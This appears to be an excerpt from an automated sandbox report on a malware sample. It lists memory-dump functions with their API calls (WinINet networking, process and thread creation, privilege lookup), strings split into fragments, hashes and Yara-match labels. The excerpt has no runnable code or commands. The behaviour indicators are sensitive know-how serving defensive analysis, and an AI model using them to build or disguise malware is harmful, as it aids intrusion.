Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0203FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FBC3

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0203F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203F90E

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0203F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203F9FB

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0203FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FEDB

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0203FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FFBF

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0203FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FC6B

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0203FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FD9A

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0203FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0203FDCB

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 002088C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00208928

Strings

HttpOpenRequestA, xrefs: 002088CD, 002088D0
HttpOpenRequestA, xrefs: 0020891A, 00208925
Open, xrefs: 002088E1
RequestA, xrefs: 00208922, 00208927
Http, xrefs: 002088DA
Requ, xrefs: 002088E8
OpenRequestA, xrefs: 0020891E, 00208926
estA, xrefs: 002088EF

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: dcd1588ea6f884d3a7cc53f7c1123354a220223a9a9fb675bbed56359f5e7a52
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: 2901E9B2915219AFCB14DF98D841DEF7BB9EB48210F158288FD48A7345D630ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 002088B6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00208928

Strings

HttpOpenRequestA, xrefs: 002088CD, 002088D0
HttpOpenRequestA, xrefs: 0020891A, 00208925
Open, xrefs: 002088E1
RequestA, xrefs: 00208922, 00208927
Http, xrefs: 002088DA
Requ, xrefs: 002088E8
OpenRequestA, xrefs: 0020891E, 00208926
estA, xrefs: 002088EF

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
Instruction ID: 8f9c179d299b4a87fee31ee367826bae73a21231126ef5368551bfec0f4be88e
Opcode Fuzzy Hash: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
Instruction Fuzzy Hash: 970117B2905159AFCB14DF98C881DEF7BB9EF88210F158248FD48A7345C630A910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00208836, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 50networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 002088A8

Strings

ectA, xrefs: 0020886F
ConnectA, xrefs: 002088A2, 002088A7
InternetConnectA, xrefs: 0020889A, 002088A5
Conn, xrefs: 00208868
Inte, xrefs: 0020885A
rnetConnectA, xrefs: 0020889E, 002088A6
rnet, xrefs: 00208861

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
Instruction ID: 82b732035455f45765de1d8d32433db07b6aee89a25af5f1e2cdc77373e5fd69
Opcode Fuzzy Hash: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
Instruction Fuzzy Hash: A5011EB2915158AFCB14DF99D981EEF7BB9FB48350F154148FA48A7241C6309A10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00208840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 002088A8

Strings

ectA, xrefs: 0020886F
ConnectA, xrefs: 002088A2, 002088A7
InternetConnectA, xrefs: 0020889A, 002088A5
Conn, xrefs: 00208868
Inte, xrefs: 0020885A
rnetConnectA, xrefs: 0020889E, 002088A6
rnet, xrefs: 00208861

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: 3ddfb86e0d4ad847f4b18ec308f0c28723dd3f9b9d03f086eb56973ff3b285e3
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: F001E9B2915119AFCB14DF99D941EEF77B9EB48310F158289BE48A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 002087D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00208827

Strings

Open, xrefs: 002087F8
rnetOpenA, xrefs: 00208821, 00208826
Inte, xrefs: 002087EA
rnet, xrefs: 002087F1
InternetOpenA, xrefs: 0020881D, 00208825
A, xrefs: 002087FF

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: e31d4f663a1c9f3365a6033173012e59c1dd6af119bfb1ceaae99c9e82544c72
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: 45F01DB2911219AFCB14DF98DC419FB77B8EF48310B048589BD5897242D634AE20CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 002087C8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 40networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00208827

Strings

Open, xrefs: 002087F8
rnetOpenA, xrefs: 00208821, 00208826
Inte, xrefs: 002087EA
rnet, xrefs: 002087F1
InternetOpenA, xrefs: 0020881D, 00208825
A, xrefs: 002087FF

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
Instruction ID: 375721b653f8bcd6e9a0d223945a26c5ff7dd43adec131cfdba0df8ff6c9789b
Opcode Fuzzy Hash: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
Instruction Fuzzy Hash: E2016DB2911129AFCB14DFA8D8859EF7B79EF48310B048189FD5467202D630AA11CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00206ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00206F78

Strings

net.dll, xrefs: 00206F41, 00206FC7, 00206F9F, 00206FAB, 00206FD3
wininet.dll, xrefs: 00206F2E, 00206F37

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 2085ce6da06740b0bda922b26ec53f6d64d51f10a627fdc285a801fe3f36fa21
Instruction ID: d302dac462a92eef064748cf32d687a6eb3013769c7eaea106fc215622ae01c1
Opcode Fuzzy Hash: 2085ce6da06740b0bda922b26ec53f6d64d51f10a627fdc285a801fe3f36fa21
Instruction Fuzzy Hash: DE31C1B1611705ABC711DFA8D8A5FA7B7B8BF48700F00841DF61A9B282D770B865CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00206EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00206F78

Strings

net.dll, xrefs: 00206F41, 00206F9F, 00206FAB
wininet.dll, xrefs: 00206F2E, 00206F37

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 7c8312f7ab9be3b4e6db919955d652bc4b78f4b3a5faca433bbd048fe2a8af8f
Instruction ID: fdf3bd1413ed4e1337e6cf9ac74b11c35e03c2d3dbb899b4957c3935f6ae7a5c
Opcode Fuzzy Hash: 7c8312f7ab9be3b4e6db919955d652bc4b78f4b3a5faca433bbd048fe2a8af8f
Instruction Fuzzy Hash: 5031C5B1611305ABD710EFA4D8A5F9BBBB4BF44704F10811DF51A5B682D370A461CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002084B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001F3B93), ref: 002084ED

Strings

.z`, xrefs: 002084DC, 002084E8

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction ID: 879f6c101bc78ebc900b17e75bb48ab78446486e38d13c2d64f528dcb142e41c
Opcode Fuzzy Hash: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction Fuzzy Hash: 2CE092B1200704BBDB14DF64CC49EA7376CAF88750F114199FE085B382D531E911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 002084C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001F3B93), ref: 002084ED

Strings

.z`, xrefs: 002084DC, 002084E8

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 694099f859d0cb2774908d3cdeb2a8313608d5f60414704e1ea24f919a035e8c
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 52E01AB1210204ABDB14DF59CC45EA777ACAF88750F014554BA0857282CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 001F7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001F72DB

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: 46b6fc8d9f79ba5ddaf2889eff0c4b70e82d3b0bbfabae03850d4d50d5fea8d4
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: AC01A231A803287AEB20B6949C03FFE776C5B00B50F144119FF04BA1C2E7A46A068AF6

Uniqueness

Uniqueness Score: -1.00%

Function 0020852D, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00208584

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction ID: 5e406aa55fec1d3a4bc183fe5a7d9525dbf20354bf36681c9b6009e74cdd9e1d
Opcode Fuzzy Hash: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction Fuzzy Hash: 6411C9B2214208BBCB14DF99DC80DEB77ADAF8C754F158259FA4D97242DA30E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 001F9B82

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 0661c1b8776d46858a475e69d509df30f437fd0d3b8a9478ebfa81d6bfaf1919
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BC011EB5D4020DABDF10EAE4EC42FADB3789B54308F0041A5EA0897282F671EB58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00208530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00208584

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: d5811a146c5597f344c4301dd54a66361babed2c3c54032f8b1c73454ff313da
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: FE01AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00206FF3, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001FCCC0,?,?), ref: 0020703C

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction ID: 802db999df8ae791b016a9d6fd87efd74af316f4c9b81866c93dc44d3cd62eb6
Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction Fuzzy Hash: 22F0E57225030037D7306648CC03FE77258DB95B10F240029F649AB2C2C995B9124AE5

Uniqueness

Uniqueness Score: -1.00%

Function 00207000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001FCCC0,?,?), ref: 0020703C

Memory Dump Source

Source File: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: f41831339f85e2e37b6a4451cf5107cc573069603cacc1d9284e872f3e1f425d
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: BBE092733913043AE3306599AC03FA7B39CDB81B20F140126FA0DEB2C2D995F91146A8

Uniqueness

Uniqueness Score: -1.00%

Function 00208620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,001FCF92,001FCF92,?,00000000,?,?), ref: 00208650

